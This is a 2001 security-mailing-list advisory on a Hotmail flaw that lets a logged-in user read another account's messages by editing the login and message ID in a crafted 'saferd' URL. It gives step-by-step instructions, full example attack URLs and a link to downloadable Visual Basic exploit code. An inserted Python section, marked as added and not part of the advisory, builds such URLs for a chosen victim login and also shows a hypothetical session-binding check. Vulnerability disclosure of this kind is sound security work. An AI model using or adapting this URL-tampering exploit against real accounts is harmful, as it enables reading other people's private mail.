[NEWS] Viewing Someone's Hotmail Account in Three Easy Steps
From: support@securiteam.com Date: 08/22/01
From: support@securiteam.com To: list@securiteam.com Subject: [NEWS] Viewing Someone's Hotmail Account in Three Easy Steps Message-Id: <20010822052205.5DBFF138BF@mail.der-keiler.de> Date: Wed, 22 Aug 2001 07:22:05 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Viewing Someone's Hotmail Account in Three Easy Steps
------------------------------------------------------------------------
SUMMARY
A bug in Hotmail allows a user who knows only another person's Hotmail username
(and can guess a message ID, which is a simple counter) to read that person's
e-mail by requesting a specially crafted URL from their own logged-in session.
DETAILS
To view a full e-mail message from someone else's account, do the following:
1. Log in normally to Hotmail with your own ID (any ID will do).
2. Use a link of the following form to request a specific message from a specific user:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
Or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
In that link, change the following values inside the hm___qs parameter:
msg (MSG998047250%2e22 in the example URLs above): the message ID, which is simply a counter.
login (username in the example URLs above): the Hotmail account name whose message you want to view.
(Remove "%26raw%3d0" if you want to see the message in the normal mailbox view
instead of the full raw view.)
(Remove "&hm___fl=attrd&domain=hotmail.com" if you do not want the Hotmail
frame on top.)
The remaining getmsg parameters in hm___qs (start, len and disk) are carried
over from the example URL unchanged; the advisory does not say how to obtain
them for an arbitrary message.
3. Done. If you entered a correct message ID and username, the message is
displayed. (Try it first against messages in a second Hotmail account of your
own to see how it works.)
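The following Python is an added example, not code from the advisory or from the Digital-Vortex exploit. It builds a saferd URL of the form shown above from the two values the advisory says to change (login and msg), and parses one back into its fields, so the two encoding layers are visible: the outer saferd query carries a target URL (hm___tg) and a percent-encoded inner getmsg query (hm___qs) that names the mailbox to read. The front-end host, the getmsg address and the start/len/disk values are copied from the example URL; the session-binding check at the end is an illustrative assumption about what such a gateway should enforce, not a description of Hotmail's actual code.

```python
"""Build and parse Hotmail 'saferd' gateway URLs of the form in the advisory.

Added example; not the advisory's or Digital-Vortex's code.  Host, target and
inner parameter values are copied from the advisory's example URL.
"""
from urllib.parse import urlsplit, parse_qs

# Values copied from the advisory's example URL.
FRONT_END = "pv2fd.pav2.hotmail.msn.com"
GETMSG_TARGET = "http://64.4.36.250/cgi-bin/getmsg"
DEFAULT_INNER = {"start": "9702", "len": "9687", "disk": "64.4.36.68_d1577"}


def hm_quote(text: str) -> str:
    """Percent-encode the way the advisory's URLs are encoded: only ASCII
    letters, digits and '_' stay bare; everything else (including '.', '-',
    ':' and '/') becomes a lowercase %xx escape."""
    return "".join(
        c if (c.isascii() and c.isalnum()) or c == "_" else "%%%02x" % ord(c)
        for c in text
    )


def build_saferd_url(login: str, msg_id: str, *, front_end: str = FRONT_END,
                     raw: bool = True, frame: bool = True) -> str:
    """Assemble the gateway URL.  `login` is the mailbox getmsg will read,
    `msg_id` the counter-style message ID (e.g. 'MSG998047250.22')."""
    inner = {"msg": msg_id,
             "start": DEFAULT_INNER["start"],
             "len": DEFAULT_INNER["len"]}
    if raw:
        inner["raw"] = "0"        # advisory: drop raw=0 for the mailbox view
    inner["disk"] = DEFAULT_INNER["disk"]
    inner["login"] = login
    inner["domain"] = "hotmail.com"
    # The inner query string starts with '&', exactly as in the advisory's URL.
    inner_qs = "".join(f"&{k}={v}" for k, v in inner.items())
    url = (f"http://{front_end}/cgi-bin/saferd?_lang=EN"
           f"&hm___tg={hm_quote(GETMSG_TARGET)}"
           f"&hm___qs={hm_quote(inner_qs)}")
    if frame:
        url += "&hm___fl=attrd&domain=hotmail.com"   # Hotmail frame on top
    return url


def parse_saferd_url(url: str) -> dict:
    """Undo both encoding layers: return the getmsg target and the decoded
    inner parameters (msg, start, len, raw, disk, login, domain)."""
    outer = parse_qs(urlsplit(url).query)
    target = outer["hm___tg"][0]
    # parse_qs skips the empty field produced by the leading '&'.
    inner = {k: v[0] for k, v in parse_qs(outer["hm___qs"][0]).items()}
    return {"target": target, "inner": inner}


def login_bound_to_session(url: str, session_login: str) -> bool:
    """Hypothetical server-side check (assumption, not Hotmail's code): the
    login named in hm___qs must equal the login of the authenticated session.
    The advisory's bug is that any login value is accepted."""
    return parse_saferd_url(url)["inner"].get("login") == session_login


if __name__ == "__main__":
    victim_url = build_saferd_url("username", "MSG998047250.22")
    print(victim_url)
    print(parse_saferd_url(victim_url))
    print("accepted for session 'attacker':",
          login_bound_to_session(victim_url, "attacker"))
```

With the constructed inputs login="username" and msg_id="MSG998047250.22", build_saferd_url reproduces the first example URL byte for byte; parse_saferd_url shows that the backend target and the login are both attacker-supplied, which is why binding login to the session (login_bound_to_session) is the check that was missing.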
Exploit code (Visual Basic):
Exploit code can be downloaded from:
http://www.root-core.com/ (web site)
http://rootcore.can-host.com/files/hobo04r2.zip (direct link)
ADDITIONAL INFORMATION
The information has been provided by Digital-Vortex <root@root-core.com>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.